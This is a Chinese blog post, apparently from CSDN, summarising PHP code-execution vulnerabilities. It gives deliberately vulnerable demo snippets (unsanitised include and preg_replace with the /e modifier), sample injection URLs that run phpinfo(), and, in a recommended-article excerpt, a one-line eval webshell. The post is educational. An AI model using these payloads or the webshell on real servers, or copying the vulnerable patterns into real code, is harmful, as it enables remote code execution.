执行漏洞总结

最新推荐文章于 2024-07-10 21:39:46 发布
最新推荐文章于 2024-07-10 21:39:46 发布
阅读量97 收藏
点赞数
分类专栏: 代码安全基础 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45486362/article/details/106972988
版权
preg_replace()使用一 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:<?phpecho `dir`;?>二 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、include_once()、 require()、require_once(
摘要由CSDN通过智能技术生成

preg_replace()使用

一 代码执行函数

PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()

demo code 1.1:

<?php
echo `dir`;
?>

二 文件包含代码注射

文件包含函数在特定条件下的代码注射,如

include()、include_once()require()、require_once()

当allow_url_include=On ,PHP Version>=5.2.0 时,导致代码注射

demo code 2.1:

<?php
include($_GET['a']);
?>

访问http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E 即
执行phpinfo()。

三 正则匹配代码注射

众所周知的preg_replace()函数导致的代码注射。当pattern中存在/e模式修饰符,即允许执行代码。这里我们分三种情况讨论下

3.1 preg_replace() pattern 参数注射

pattern即第一个参数的代码注射。
当magic_quotes_gpc=Off时,导致代码执行。

demo code 3.1:

<?php
echo $regexp = $_GET['reg'];
$var = '<php>phpinfo()</php>';
preg_replace("/<php>(.*?)$regexp", '\\1', $var);
?>

访问http://127.0.0.1/preg_replace1.php?reg=%3C/php%3E/e 即
执行phpinfo()。

3.2 preg_replace() replacement参数注射

replacement即第二个参数的代码注射,导致代码执行。

demo code 3.2:

<?<
最低0.47元/天 解锁文章
凉水沏茶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP代码执行漏洞总结大全
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
PHP代码执行漏洞总结
ask every day
04-23 3495
PHP代码执行漏洞总结ref : http://blog.csdn.net/kuangmang/article/details/27170309ref : http://blog.csdn.net/fuckcat_2333/article/details/521259511 代码执行函数php中可以执行代码的函数有: eval()、assert()、``、system()、exec()、shell...
代码执行漏洞总结
u014794539的博客
07-25 1579
代码执行漏洞是把代码注入到Web服务器中执行,而命令执行漏洞执行的系统命令 , 代码执行漏洞 有的应用程序提供了一些可以将字符串作为代码执行的函数,如果对这些函数控制不严格,就可能被攻击者利用,执行恶意代码 eval函数 eval函数把字符串作为PHP代码执行 eval(string $code) eval实例代码 比如一句话木马 <?php @eval($_POST[1])?> assert函数 assert函数检查一个断言是否为FALSE bool assert(mixed $asse
漏洞总结
Libra_Ng
03-06 2458
会话固定攻击(Session Fixation) ⚡️会话固定攻击(session fixation attack)是利用应用系统在服务器的会话ID固定不变机制,借助他人用相同的会话ID获取认证和授权,然后利用该会话ID劫持他人的会话以成功冒充他人,造成会话固定攻击。 整个攻击流程: 攻击者Attacker能正常访问该应用网站。 应用网站服务器返回一个会话ID给他。 攻击者Atta...
代码执行漏洞总结.xmind
05-30
代码执行漏洞总结.xmind
web中间件常见漏洞总结.pdf
12-14
以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意SQL语句,从而获取敏感信息、篡改数据甚至完全控制数据库。 2. **跨站脚本(XSS)**:XSS...
SRC漏洞挖掘实战经验总结
10-28
本篇文章将基于"SRC漏洞挖掘实战经验总结"的主题,深入探讨相关知识点。 一、SRC漏洞挖掘的基本概念 SRC,即安全响应中心,是企业或组织为了管理和处理安全事件设立的专门机构。漏洞挖掘则是SRC的核心任务之一,...
VS2019提示scanf不安全问题
weixin_45486362的博客
04-22 6069
我们现在学的就是使用scanf()语句进行输入,但是vs2019中却报错显示不安全 首先我先来说一下scanf和scanf-s的区别 scanf()函数是标准C中提供的标准输入函数,用以用户输入数据 scanf_s()函数是Microsoft公司VS开发工具提供的一个功能相同的安全标准输入函数,从vc++2005开始,VS系统提供了scanf_s()。在调用该函数时,必须提供一个数字以表明最多读...
PHP函数功能
weixin_45486362的博客
06-26 206
PHP函数功能 函数 描述 PHP basename() 返回路径中的文件名部分。 chgrp() 改变文件组。 chmod() 改变文件模式。 chown() 改变文件所有者。 clearstatcache() 清除文件状态缓存。 copy() 复制文件。 delete() 参见 unlink() 或 unset()。 dirname() 返回路径中的目录名称部分。 disk_free_space() 返回目录的可用空间。 disk_total_space() 返回一个目录的磁盘总容量。 diskfree
PHP程序的常见漏洞攻击分析
weixin_45486362的博客
06-26 156
PHP程序的常见漏洞攻击分析 不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP安全性。 如何通过全局变量进行攻击? PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致
HTML最详细的教程
weixin_45486362的博客
04-14 148
1.各元素都是一种标记或者标签 2.单标签格式<名称/>,双标签<名称></名称> 3.对大小写不敏感 基本结构: 文字内容 文字内容 <html> <head> <title>文字内容</title> </head> <body>'; `基础标签: &...
JAVAscript基础
weixin_45486362的博客
04-15 68
基础与内容输出 一种直译式的脚本语言 使用: 1.命令通常以;结束 2.HTML中的JS代码要在<script></script>之间 3.JS的代码可以独立存在一个JS文件中 备注:独立文件中只存放函数就行,不能跟标签 4.独立的JS文件可以在<script></script>标签的src属性中引用 备注:<s...
python面向对象编程
weixin_45486362的博客
04-23 64
面向对象编程 OOP :object oriented programming 1.类 设计一个飞机plane 图纸 几个螺旋桨 几个机翼 几个轮子 飞机多长 命名规则: 驼峰式命名法 大驼峰 PrintStar 小驼峰 Printstar 元素: 类名 属性 方法 class Make_Plane(object): #属性 color = “green” wheelNum = 3 ##魔法方法...
什么是RPC?有哪些RPC框架?
yuiezt的专栏
07-09 1825
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
PHP编程开发工具有哪些?
Pythonit教程网
07-10 1010
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
最新发布
AllenIverrui的博客
07-10 981
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉水沏茶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值